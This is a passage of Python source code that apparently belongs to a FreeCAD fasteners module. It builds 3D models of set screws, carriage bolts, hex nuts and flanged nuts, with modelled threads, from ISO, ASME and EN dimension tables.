p4 = Base.Vector(dt / 2, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e2, e3, e4, e5])
elif SType == 'ISO4028' or SType == 'ASMEB18.3.5C':
# the shortest available dog-point set screws often have
# shorter dog-points. There is not much hard data accessible for this
# approximate by halving the dog length for short screws
if l < 1.5 * d:
z = z * 0.5
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dp) / 2 + z))
p4 = Base.Vector(dp / 2, 0, -1 * l + z)
p5 = Base.Vector(dp / 2, 0, -1 * l)
p6 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
e6 = Part.makeLine(p5, p6)
p_profile = Part.Wire([e2, e3, e4, e5, e6])
elif SType == 'ISO4029' or SType == 'ASMEB18.3.5D':
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dp) / 2))
p4 = Base.Vector(dp / 2, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l + math.sqrt(3) / 6 * dp)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e2, e3, e4, e5])
p_shell = p_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
# generate a top face with a hex-key recess
top_face_profile = Part.Wire([e1])
top_face = top_face_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
hex_solid, hex_shell = self.makeAllen2(s, t - 1, 0)
top_face = top_face.cut(hex_solid)
p_faces = p_shell.Faces
p_faces.extend(top_face.Faces)
hex_shell.translate(Base.Vector(0, 0, -1))
p_faces.extend(hex_shell.Faces)
p_shell = Part.Shell(p_faces)
screw = Part.Solid(p_shell)
# chamfer the hex recess
cham_p1 = Base.Vector(0, 0, 0)
cham_p2 = Base.Vector(s / math.sqrt(3), 0, 0)
cham_p3 = Base.Vector(0, 0, 0 - s / math.sqrt(3)) # 45 degree chamfer
cham_e1 = Part.makeLine(cham_p1, cham_p2)
cham_e2 = Part.makeLine(cham_p2, cham_p3)
cham_profile = Part.Wire([cham_e1, cham_e2])
cham_shell = cham_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
cham_solid = Part.Solid(cham_shell)
screw = screw.cut(cham_solid)
# produce a modelled thread if necessary
if self.rThread:
# calculate the number of thread half turns
residue, turns = math.modf((l) / P)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 9
else:
halfturns = halfturns + 8
# make the threaded section
d = d / 1.01
shell_thread = self.makeShellthread(d, P, halfturns, False, 0)
thr_p1 = Base.Vector(0, 0, 2 * P)
thr_p2 = Base.Vector(d / 2, 0, 2 * P)
thr_e1 = Part.makeLine(thr_p1, thr_p2)
thr_cap_profile = Part.Wire([thr_e1])
thr_cap = thr_cap_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
thr_faces = shell_thread.Faces
thr_faces.extend(thr_cap.Faces)
thread_shell = Part.Shell(thr_faces)
thread_solid = Part.Solid(thread_shell)
thread_solid.translate(Base.Vector(0, 0, 2 * P))
# Part.show(thread_solid)
screw = screw.common(thread_solid)
return screw
def makeCarriageBolt(self, SType='ASMEB18.5.2', Threadtype='1/4in', l=25.4):
d = self.getDia(Threadtype, False)
if SType == 'ASMEB18.5.2':
tpi, _, A, H, O, P, _, _ = FsData["asmeb18.5.2def"][Threadtype]
A, H, O, P = (25.4 * x for x in (A, H, O, P))
pitch = 25.4 / tpi
if l <= 152.4:
L_t = d * 2 + 6.35
else:
L_t = d * 2 + 12.7
# lay out points for head generation
p1 = Base.Vector(0, 0, H)
head_r = A / math.sqrt(2)
p2 = Base.Vector(head_r * math.sin(math.pi / 8), 0, H - head_r + head_r * math.cos(math.pi / 8))
p3 = Base.Vector(A / 2, 0, 0)
p4 = Base.Vector(math.sqrt(2) / 2 * O, 0, 0)
p5 = Base.Vector(math.sqrt(2) / 2 * O, 0, -1 * P + (math.sqrt(2) / 2 * O - d / 2))
p6 = Base.Vector(d / 2, 0, -1 * P)
# arcs must be converted to shapes in order to be merged with other line segments
a1 = Part.Arc(p1, p2, p3).toShape()
l2 = Part.makeLine(p3, p4)
l3 = Part.makeLine(p4, p5)
l4 = Part.makeLine(p5, p6)
wire1 = Part.Wire([a1, l2, l3, l4])
head_shell = wire1.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
if not self.rThread:
# simplified threaded section
p7 = Base.Vector(d / 2, 0, -1 * l + d / 10)
p8 = Base.Vector(d / 2 - d / 10, 0, -1 * l)
p9 = Base.Vector(0, 0, -1 * l)
l5 = Part.makeLine(p6, p7)
l6 = Part.makeLine(p7, p8)
l7 = Part.makeLine(p8, p9)
thread_profile_wire = Part.Wire([l5, l6, l7])
shell_thread = thread_profile_wire.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
else:
# modeled threaded section
# calculate the number of thread half turns
if l <= L_t: # fully threaded fastener
residue, turns = math.modf((l - P) / pitch)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 1
shell_thread = self.makeShellthread(d, pitch, halfturns, False, 0)
shell_thread.translate(Base.Vector(0, 0, -2 * pitch - P))
else: # partially threaded fastener
residue, turns = math.modf((L_t - P) / pitch)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 1
shell_thread = self.makeShellthread(d, pitch, halfturns, False, 0)
shell_thread.translate(Base.Vector(0, 0, -2 * pitch - P - (l - L_t)))
p7 = Base.Vector(d / 2, 0, -1 * P - (l - L_t))
helper_wire = Part.Wire([Part.makeLine(p6, p7)])
shank = helper_wire.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
shell_thread = Part.Shell(shell_thread.Faces + shank.Faces)
p_shell = Part.Shell(head_shell.Faces + shell_thread.Faces)
p_solid = Part.Solid(p_shell)
# cut 4 flats under the head
for i in range(4):
p_solid = p_solid.cut(
Part.makeBox(d, A, P, Base.Vector(d / 2, -1 * A / 2, -1 * P)).rotate(Base.Vector(0, 0, 0),
Base.Vector(0, 0, 1), i * 90))
# removeSplitter is equivalent to the 'Refine' option for FreeCAD PartDesign objects
return p_solid.removeSplitter()
def makeHextool(self, s_hex, k_hex, cir_hex):
# makes a cylinder with an inner hex hole, used as cutting tool
# create hexagon face
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s_hex / math.sqrt(3.0), 0.0, -k_hex * 0.1)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexagon = Part.Face(hexagon)
# create circle face
circ = Part.makeCircle(cir_hex / 2.0, Base.Vector(0.0, 0.0, -k_hex * 0.1))
circ = Part.Face(Part.Wire(circ))
# Create the face with the circle as outline and the hexagon as hole
face = circ.cut(hexagon)
# Extrude in z to create the final cutting tool
exHex = face.extrude(Base.Vector(0.0, 0.0, k_hex * 1.2))
# Part.show(exHex)
return exHex
def makeShellthread(self, dia, P, hrots, withcham, offset):
"""
Construct a 60 degree screw thread with diameter dia,
pitch P, and length approximately equal to hrots*P/2.
if withcham == True, the end of the thread is nicely chamfered.
The thread is constructed z-up, as a shell, with the top circular
face removed. The top of the shell is centered @ (0,0,2*P-offset)
"""
# make a cylindrical solid, then cut the thread profile from it
H = math.sqrt(3) / 2 * P
# move the very bottom of the base up a tiny amount
# prevents some too-small edges from being created
correction = 1e-5
base_pnts = list(map(lambda x: Base.Vector(x),
[
[dia / 2, 0, 2 * P - offset],
[dia / 2, 0, -1 * (hrots - 2) * P / 2 + P / 2],
[dia / 2 - P / 2, 0, -1 * (hrots - 2) * P / 2 + correction],
[0, 0, -1 * (hrots - 2) * P / 2 + correction],
[0, 0, 2 * P - offset],
[dia / 2, 0, -1 * (hrots - 2) * P / 2 + correction]
]))
if withcham:
base_profile = Part.Wire([
Part.makeLine(base_pnts[0], base_pnts[1]),
Part.makeLine(base_pnts[1], base_pnts[2]),
Part.makeLine(base_pnts[2], base_pnts[3]),
Part.makeLine(base_pnts[3], base_pnts[4]),
Part.makeLine(base_pnts[4], base_pnts[0]),
])
else:
base_profile = Part.Wire([
Part.makeLine(base_pnts[0], base_pnts[5]),
Part.makeLine(base_pnts[5], base_pnts[3]),
Part.makeLine(base_pnts[3], base_pnts[4]),
Part.makeLine(base_pnts[4], base_pnts[0]),
])
base_shell = base_profile.revolve(
Base.Vector(0, 0, 0),
Base.Vector(0, 0, 1),
360)
base_body = Part.makeSolid(base_shell)
# create a sketch profile of the thread
# ref: https://en.wikipedia.org/wiki/ISO_metric_screw_thread
fillet_r = P * math.sqrt(3) / 12
helix_height = (hrots + 2) * P / 2
pnts = list(map(lambda x: Base.Vector(x),
[
[dia / 2 + math.sqrt(3) * 3 / 80 * P, 0, -0.475 * P],
[dia / 2 - 0.625 * H, 0, -1 * P / 8],
[dia / 2 - 0.625 * H - 0.5 * fillet_r, 0, 0],
[dia / 2 - 0.625 * H, 0, P / 8],
[dia / 2 + math.sqrt(3) * 3 / 80 * P, 0, 0.475 * P]
]))
thread_profile_wire = Part.Wire([
Part.makeLine(pnts[0], pnts[1]),
Part.Arc(pnts[3], pnts[2], pnts[1]).toShape(),
Part.makeLine(pnts[3], pnts[4]),
Part.makeLine(pnts[4], pnts[0])])
thread_profile_wire.translate(Base.Vector(0, 0, -1 * helix_height))
# make the helical paths to sweep along
# NOTE: makeLongHelix creates slightly conical
# helices unless the 4th parameter is set to 0!
main_helix = Part.makeLongHelix(P, helix_height, dia / 2, 0)
lead_out_helix = Part.makeHelix(P, P / 2, dia / 2 + 0.5 * (5 / 8 * H + 0.5 * fillet_r))
main_helix.rotate(Base.Vector(0, 0, 0), Base.Vector(1, 0, 0), 180)
lead_out_helix.translate(Base.Vector(0.5 * (-1 * (5 / 8 * H + 0.5 * fillet_r)), 0, 0))
sweep_path = Part.Wire([main_helix, lead_out_helix])
# use Part.BrepOffsetAPI to sweep the thread profile
# ref: https://forum.freecadweb.org/viewtopic.php?t=21636#p168339
sweep = Part.BRepOffsetAPI.MakePipeShell(sweep_path)
sweep.setFrenetMode(True)
sweep.setTransitionMode(1) # right corner transition
sweep.add(thread_profile_wire)
if sweep.isReady():
sweep.build()
else:
# geometry couldn't be generated in a useable form
raise RuntimeError("Failed to create shell thread: could not sweep thread")
sweep.makeSolid()
swept_solid = sweep.shape()
# translate swept path slightly for backwards compatibility
swept_solid.translate(Base.Vector(0, 0, P / 2 + P / 16))
# perform the actual boolean operations
base_body.rotate(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 90)
threaded_solid = base_body.cut(swept_solid)
if offset > P:
# one more component: a kind of 'cap' to improve behaviour with
# large offset values
cap_bottom_point = Base.Vector(0, 0, 2 * P - offset - dia / 2)
cap_profile = Part.Wire([
Part.makeLine(base_pnts[4], base_pnts[0]),
Part.makeLine(base_pnts[0], cap_bottom_point),
Part.makeLine(cap_bottom_point, base_pnts[4])])
cap_shell = cap_profile.revolve(
Base.Vector(0, 0, 0),
Base.Vector(0, 0, 1),
360)
cap_solid = Part.makeSolid(cap_shell)
threaded_solid = threaded_solid.fuse(cap_solid)
threaded_solid.removeSplitter
# remove top face(s) and convert to a shell
result = Part.Shell([x for x in threaded_solid.Faces \
if not abs(x.CenterOfMass[2] - (2 * P - offset)) < 1e-7])
return result
# if da is not None: make Shell for a nut else: make a screw tap
def makeInnerThread_2(self, d, P, rotations, da, l):
d = float(d)
bot_off = 0.0 # nominal length
if d > 52.0:
fuzzyValue = 5e-5
else:
fuzzyValue = 0.0
H = P * math.cos(math.radians(30)) # Thread depth H
r = d / 2.0
helix = Part.makeHelix(P, P, d * self.Tuner / 1000.0, 0) # make just one turn, length is identical to pitch
helix.translate(FreeCAD.Vector(0.0, 0.0, -P * 9.0 / 16.0))
extra_rad = P
# points for inner thread profile
ps0 = (r, 0.0, 0.0)
ps1 = (r - H * 5.0 / 8.0, 0.0, -P * 5.0 / 16.0)
ps2 = (r - H * 5.0 / 8.0, 0.0, -P * 9.0 / 16.0)
ps3 = (r, 0.0, -P * 14.0 / 16.0)
ps4 = (r + H * 1 / 24.0, 0.0, -P * 31.0 / 32.0) # Center of Arc
ps5 = (r, 0.0, -P)
ps6 = (r + extra_rad, 0.0, -P)
ps7 = (r + extra_rad, 0.0, 0.0)
edge0 = Part.makeLine(ps0, ps1)
edge1 = Part.makeLine(ps1, ps2)
edge2 = Part.makeLine(ps2, ps3)
edge3 = Part.Arc(FreeCAD.Vector(ps3), FreeCAD.Vector(ps4), FreeCAD.Vector(ps5)).toShape()
edge4 = Part.makeLine(ps5, ps6)
edge5 = Part.makeLine(ps6, ps7)
edge6 = Part.makeLine(ps7, ps0)
W0 = Part.Wire([edge0, edge1, edge2, edge3, edge4, edge5, edge6])
# Part.show(W0, 'W0')
makeSolid = True
isFrenet = True
pipe0 = Part.Wire(helix).makePipeShell([W0], makeSolid, isFrenet)
# pipe1 = pipe0.copy()
TheFaces = []
TheFaces.append(pipe0.Faces[0])
TheFaces.append(pipe0.Faces[1])
TheFaces.append(pipe0.Faces[2])
TheFaces.append(pipe0.Faces[3])
# topHeliFaces = [pipe0.Faces[6], pipe0.Faces[8]]
# innerHeliFaces = [pipe0.Faces[5]]
# bottomFaces = [pipe0.Faces[4], pipe0.Faces[7]]
TheShell = Part.Shell(TheFaces)
# singleThreadShell = TheShell.copy()
# print "Shellpoints: ", len(TheShell.Vertexes)
if da is None:
commonbox = Part.makeBox(d + 4.0 * P, d + 4.0 * P, 3.0 * P)
commonbox.translate(FreeCAD.Vector(-(d + 4.0 * P) / 2.0, -(d + 4.0 * P) / 2.0, -(3.0) * P))
topShell = TheShell.common(commonbox)
top_edges = []
top_z = -1.0e-5
for kante in topShell.Edges:
if kante.Vertexes[0].Point.z >= top_z and kante.Vertexes[1].Point.z >= top_z:
top_edges.append(kante)
# Part.show(kante)
top_wire = Part.Wire(Part.__sortEdges__(top_edges))
top_face = Part.Face(top_wire)
TheFaces = [top_face.Faces[0]]
TheFaces.extend(topShell.Faces)
for i in range(rotations - 2):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, - P))
for flaeche in TheShell.Faces:
TheFaces.append(flaeche)
# FreeCAD.Console.PrintMessage("Base-Shell: " + str(i) + "\n")
# Make separate faces for the tip of the screw
botFaces = []
for i in range(rotations - 2, rotations, 1):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, - P))
for flaeche in TheShell.Faces:
botFaces.append(flaeche)
# FreeCAD.Console.PrintMessage("Bottom-Shell: " + str(i) + "\n")
# FreeCAD.Console.PrintMessage("without chamfer: " + str(i) + "\n")
commonbox = Part.makeBox(d + 4.0 * P, d + 4.0 * P, 3.0 * P)
commonbox.translate(FreeCAD.Vector(-(d + 4.0 * P) / 2.0, -(d + 4.0 * P) / 2.0, -(rotations) * P + bot_off))
# commonbox.translate(FreeCAD.Vector(-(d+4.0*P)/2.0, -(d+4.0*P)/2.0,-(rotations+3)*P+bot_off))
# Part.show(commonbox)
BotShell = Part.Shell(botFaces)
# Part.show(BotShell)
BotShell = BotShell.common(commonbox)
# BotShell = BotShell.cut(commonbox)
bot_edges = []
bot_z = 1.0e-5 - (rotations) * P + bot_off
for kante in BotShell.Edges:
if kante.Vertexes[0].Point.z <= bot_z and kante.Vertexes[1].Point.z <= bot_z:
bot_edges.append(kante)
# Part.show(kante)
bot_wire = Part.Wire(Part.__sortEdges__(bot_edges))
bot_face = Part.Face(bot_wire)
bot_face.reverse()
for flaeche in BotShell.Faces:
TheFaces.append(flaeche)
# if da is not None:
# for flaeche in cham_Shell.Faces:
# TheFaces.append(flaeche)
# else:
TheFaces.append(bot_face)
TheShell = Part.Shell(TheFaces)
TheSolid = Part.Solid(TheShell)
# print self.Tuner, " ", TheShell.ShapeType, " ", TheShell.isValid(), " rotations: ", rotations, " Shellpoints: ", len(TheShell.Vertexes)
return TheSolid
else:
# Try to make the inner thread shell of a nut
cham_i = 2 * H * math.tan(math.radians(15.0)) # inner chamfer
# points for chamfer: cut-Method
pch0 = (da / 2.0 - 2 * H, 0.0, +cham_i) # bottom chamfer
pch1 = (da / 2.0, 0.0, 0.0) #
pch2 = (da / 2.0, 0.0, - 2.1 * P)
pch3 = (da / 2.0 - 2 * H, 0.0, - 2.1 * P) #
# pch2 = (da/2.0, 0.0, l)
# pch3 = (da/2.0 - 2*H, 0.0, l - cham_i)
edgech0 = Part.makeLine(pch0, pch1)
edgech1 = Part.makeLine(pch1, pch2)
edgech2 = Part.makeLine(pch2, pch3)
edgech3 = Part.makeLine(pch3, pch0)
Wch_wire = Part.Wire([edgech0, edgech1, edgech2, edgech3])
bottom_Face = Part.Face(Wch_wire)
# bottom_Solid = bottom_Face.revolve(Base.Vector(0.0,0.0,-(rotations-1)*P),Base.Vector(0.0,0.0,1.0),360)
bottom_Solid = bottom_Face.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(cham_Solid, 'cham_Solid')
# Part.show(Wch_wire)
bottomChamferFace = bottom_Solid.Faces[0]
# points for chamfer: cut-Method
pch0t = (da / 2.0 - 2 * H, 0.0, l - cham_i) # top chamfer
pch1t = (da / 2.0, 0.0, l) #
pch2t = (da / 2.0, 0.0, l + 4 * P)
pch3t = (da / 2.0 - 2 * H, 0.0, l + 4 * P) #
edgech0t = Part.makeLine(pch0t, pch1t)
edgech1t = Part.makeLine(pch1t, pch2t)
edgech2t = Part.makeLine(pch2t, pch3t)
edgech3t = Part.makeLine(pch3t, pch0t)
Wcht_wire = Part.Wire([edgech0t, edgech1t, edgech2t, edgech3t])
top_Face = Part.Face(Wcht_wire)
top_Solid = top_Face.revolve(Base.Vector(0.0, 0.0, (rotations - 1) * P), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(top_Solid, 'top_Solid')
# Part.show(Wch_wire)
topChamferFace = top_Solid.Faces[0]
threeThreadFaces = TheFaces.copy()
for k in range(1):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, P))
for threadFace in TheShell.Faces:
threeThreadFaces.append(threadFace)
chamferShell = Part.Shell(threeThreadFaces)
# Part.show(chamferShell, 'chamferShell')
# Part.show(bottomChamferFace, 'bottomChamferFace')
bottomPart = chamferShell.cut(bottom_Solid)
# Part.show(bottomPart, 'bottomPart')
bottomFuse, bottomMap = bottomChamferFace.generalFuse([chamferShell], fuzzyValue)
# print ('bottomMap: ', bottomMap)
# chamFuse, chamMap = chamferShell.generalFuse([bottomChamferFace])
# print ('chamMap: ', chamMap)
# Part.show(bottomFuse, 'bottomFuse')
# Part.show(bottomMap[0][0], 'bMap0')
# Part.show(bottomMap[0][1], 'bMap1')
innerThreadFaces = [bottomMap[0][1]]
for face in bottomPart.Faces:
innerThreadFaces.append(face)
# bottomShell = Part.Shell(innerThreadFaces)
# Part.show(bottomShell)
bottomFaces = []
# TheShell.translate(FreeCAD.Vector(0.0, 0.0, P))
for k in range(1, rotations - 2):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, P))
for threadFace in TheShell.Faces:
innerThreadFaces.append(threadFace)
# testShell = Part.Shell(innerThreadFaces)
# Part.show(testShell, 'testShell')
chamferShell.translate(FreeCAD.Vector(0.0, 0.0, (rotations - 1) * P))
# Part.show(chamferShell, 'chamferShell')
# Part.show(topChamferFace, 'topChamferFace')
topPart = chamferShell.cut(top_Solid)
# Part.show(topPart, 'topPart')
for face in topPart.Faces:
innerThreadFaces.append(face)
topFuse, topMap = topChamferFace.generalFuse([chamferShell], fuzzyValue)
# print ('topMap: ', topMap)
# Part.show(topMap[0][0], 'tMap0')
# Part.show(topMap[0][1], 'tMap1')
# Part.show(topFuse, 'topFuse')
innerThreadFaces.append(topMap[0][1])
# topFaces = []
# for face in topPart.Faces:
# topFaces.append(face)
# topFaces.append(topMap[0][1])
# testTopShell = Part.Shell(topFaces)
# Part.show(testTopShell, 'testTopShell')
threadShell = Part.Shell(innerThreadFaces)
# Part.show(threadShell, 'threadShell')
return threadShell
# make the ISO 4032 Hex-nut
# make the ISO 4033 Hex-nut
def makeIso4032(self, SType='ISO4032', ThreadType='M6'):
dia = self.getDia(ThreadType, True)
# P, tunIn, tunEx
# Ptun, self.tuning, tunEx = tuningTable[ThreadType]
if SType == 'ISO4032':
# P, c, damax, dw, e, m, mw, s_nom
P, c, da, dw, e, m, mw, s = FsData["iso4032def"][ThreadType]
if SType == 'ISO4033':
# P, c, damax, dw, e, m, mw, s_nom
P, c, da, dw, e, m, mw, s = FsData["iso4033def"][ThreadType]
if SType == 'ISO4035':
# P, c, damax, dw, e, m, mw, s_nom
P, c, da, dw, e, m, mw, s = FsData["iso4035def"][ThreadType]
if SType == 'ASMEB18.2.2.1A':
P, da, e, m, s = FsData["asmeb18.2.2.1adef"][ThreadType]
if SType == 'ASMEB18.2.2.4A':
P, da, e, m_a, m_b, s = FsData["asmeb18.2.2.4def"][ThreadType]
m = m_a
if SType == 'ASMEB18.2.2.4B':
P, da, e, m_a, m_b, s = FsData["asmeb18.2.2.4def"][ThreadType]
m = m_b
residue, turns = math.modf(m / P)
# halfturns = 2*int(turns)
if residue > 0.0:
turns += 1.0
if SType == 'ISO4033' and ThreadType == '(M14)':
turns -= 1.0
if SType == 'ISO4035' and ThreadType == 'M56':
turns -= 1.0
sqrt2_ = 1.0 / math.sqrt(2.0)
cham = (e - s) * math.sin(math.radians(15)) # needed for chamfer at nut top
H = P * math.cos(math.radians(30)) # Gewindetiefe H
cham_i_delta = da / 2.0 - (dia / 2.0 - H * 5.0 / 8.0)
cham_i = cham_i_delta * math.tan(math.radians(15.0))
if self.rThread:
Pnt0 = Base.Vector(da / 2.0 - 2.0 * cham_i_delta, 0.0, m - 2.0 * cham_i)
Pnt7 = Base.Vector(da / 2.0 - 2.0 * cham_i_delta, 0.0, 0.0 + 2.0 * cham_i)
else:
Pnt0 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, m - cham_i)
Pnt7 = Base.Vector(dia / 2.0 - H * 5.0 / 8.0, 0.0, 0.0 + cham_i)
Pnt1 = Base.Vector(da / 2.0, 0.0, m)
Pnt2 = Base.Vector(s / 2.0, 0.0, m)
Pnt3 = Base.Vector(s / math.sqrt(3.0), 0.0, m - cham)
Pnt4 = Base.Vector(s / math.sqrt(3.0), 0.0, cham)
Pnt5 = Base.Vector(s / 2.0, 0.0, 0.0)
Pnt6 = Base.Vector(da / 2.0, 0.0, 0.0)
edge0 = Part.makeLine(Pnt0, Pnt1)
edge1 = Part.makeLine(Pnt1, Pnt2)
edge2 = Part.makeLine(Pnt2, Pnt3)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.makeLine(Pnt7, Pnt0)
# create cutting tool for hexagon head
# Parameters s, k, outer circle diameter = e/2.0+10.0
extrude = self.makeHextool(s, m, s * 2.0)
aWire = Part.Wire([edge0, edge1, edge2, edge3, edge4, edge5, edge6, edge7])
# Part.show(aWire)
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# Part.show(head)
# Part.show(extrude)
nut = head.cut(extrude)
# Part.show(nut, 'withoutTread')
if self.rThread:
# if (dia < 1.6)or (dia > 52.0):
if (dia < 1.6) or (dia > 64.0):
# if (dia < 3.0):
threadCutter = self.makeInnerThread_2(dia, P, int(turns + 1), None, m)
threadCutter.translate(Base.Vector(0.0, 0.0, turns * P + 0.5 * P))
# Part.show(threadCutter, 'threadCutter')
nut = nut.cut(threadCutter)
# chamFace = nut.Faces[0].cut(threadCutter)
# Part.show(chamFace, 'chamFace0_')
else:
nutFaces = [nut.Faces[2]]
for i in range(4, 25):
nutFaces.append(nut.Faces[i])
# Part.show(Part.Shell(nutFaces), 'OuterNutshell')
threadShell = self.makeInnerThread_2(dia, P, int(turns), da, m)
# threadShell.translate(Base.Vector(0.0, 0.0,turns*P))
# Part.show(threadShell, 'threadShell')
nutFaces.extend(threadShell.Faces)
nutShell = Part.Shell(nutFaces)
nut = Part.Solid(nutShell)
# Part.show(nutShell)
return nut
# EN 1661 Hexagon nuts with flange
# chamfer at top of hexagon is wrong = more than 30°
def makeEN1661(self, ThreadType='M8'):
dia = self.getDia(ThreadType, True)
P, da, c, dc, dw, e, m, mw, r1, s = FsData["en1661def"][ThreadType]
residue, turns = math.modf(m / P)
# halfturns = 2*int(turns)
if residue > 0.0:
turns += 1.0
# FreeCAD.Console.PrintMessage("the nut with isoEN1661: " + str(c) + "\n")
cham = s * (2.0 / math.sqrt(3.0) - 1.0) * math.sin(math.radians(25)) # needed for chamfer at head top
sqrt2_ = 1.0 / math.sqrt(2.0)
# Flange is made with a radius of c
beta = math.radians(25.0)
tan_beta = math.tan(beta)
# Calculation of Arc points of flange edge using dc and c
arc1_x = dc / 2.0 - c / 2.0 + (c / 2.0) * math.sin(beta)
arc1_z = c / 2.0 + (c / 2.0) * math.cos(beta)
hF = arc1_z + (arc1_x - s / 2.0) * tan_beta # height of flange at center
# kmean = arc1_z + (arc1_x - s/math.sqrt(3.0)) * tan_beta + mw * 1.1 + cham
# kmean = k * 0.95
# Hex-Head Points
# FreeCAD.Console.PrintMessage("the nut with kmean: " + str(m) + "\n")
PntH0 = Base.Vector(da / 2.0, 0.0, m)
PntH1 = Base.Vector(s / 2.0, 0.0, m)
edgeH1 = Part.makeLine(PntH0, PntH1)
hWire = Part.Wire([edgeH1])
topShell = hWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
# Part.show(topShell)
# create a cutter ring to generate the chamfer at the top of the hex
chamHori = s / math.sqrt(3.0) - s / 2.0
PntC1 = Base.Vector(s / 2.0 - chamHori, 0.0, m + m)
PntC2 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, m + m)
PntC3 = Base.Vector(s / 2.0 - chamHori, 0.0, m + cham)
PntC4 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, m - cham - cham) # s/math.sqrt(3.0)
edgeC1 = Part.makeLine(PntC3, PntC1)
edgeC2 = Part.makeLine(PntC1, PntC2)
edgeC3 = Part.makeLine(PntC2, PntC4)
edgeC4 = Part.makeLine(PntC4, PntC3)
cWire = Part.Wire([edgeC4, edgeC1, edgeC2, edgeC3])
cFace = Part.Face(cWire)
chamCut = cFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(cWire)
# Part.show(chamCut)
# create hexagon
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s / math.sqrt(3.0), 0.0, m)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexFace = Part.Face(hexagon)
solidHex = hexFace.extrude(Base.Vector(0.0, 0.0, c - m))
# Part.show(solidHex)
hexCham = solidHex.cut(chamCut)
# Part.show(hexCham)
topFaces = topShell.Faces
topFaces.append(hexCham.Faces[1])
topFaces.append(hexCham.Faces[2])
topFaces.append(hexCham.Faces[8])
topFaces.append(hexCham.Faces[13])
topFaces.append(hexCham.Faces[14])
topFaces.append(hexCham.Faces[12])
topFaces.append(hexCham.Faces[6])
hexFaces = [hexCham.Faces[5], hexCham.Faces[11], hexCham.Faces[10]]
hexFaces.extend([hexCham.Faces[9], hexCham.Faces[3], hexCham.Faces[0]])
hexShell = Part.Shell(hexFaces)
H = P * math.cos(math.radians(30)) # Thread depth H
cham_i_delta = da / 2.0 - (dia / 2.0 - H * 5.0 / 8.0)
cham_i = cham_i_delta * math.tan(math.radians(15.0))
# Center of flange:
Pnt0 = Base.Vector(0.0, 0.0, hF)
Pnt1 = Base.Vector(s / 2.0, 0.0, hF)
# arc edge of flange:
Pnt2 = Base.Vector(arc1_x, 0.0, arc1_z)
Pnt3 = Base.Vector(dc / 2.0, 0.0, c / 2.0)
Pnt4 = Base.Vector((dc - c) / 2.0, 0.0, 0.0)
Pnt5 = Base.Vector(da / 2.0, 0.0, 0.0) # start of fillet between flat and thread
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge4 = Part.makeLine(Pnt4, Pnt5)
# make a cutter for the hexShell
PntHC1 = Base.Vector(0.0, 0.0, arc1_z)
PntHC2 = Base.Vector(0.0, 0.0, 0.0)
edgeHC1 = Part.makeLine(Pnt2, PntHC1)
edgeHC2 = Part.makeLine(PntHC1, PntHC2)
edgeHC3 = Part.makeLine(PntHC2, Pnt0)
HCWire = Part.Wire([edge2, edgeHC1, edgeHC2, edgeHC3, edge1])
HCFace = Part.Face(HCWire)
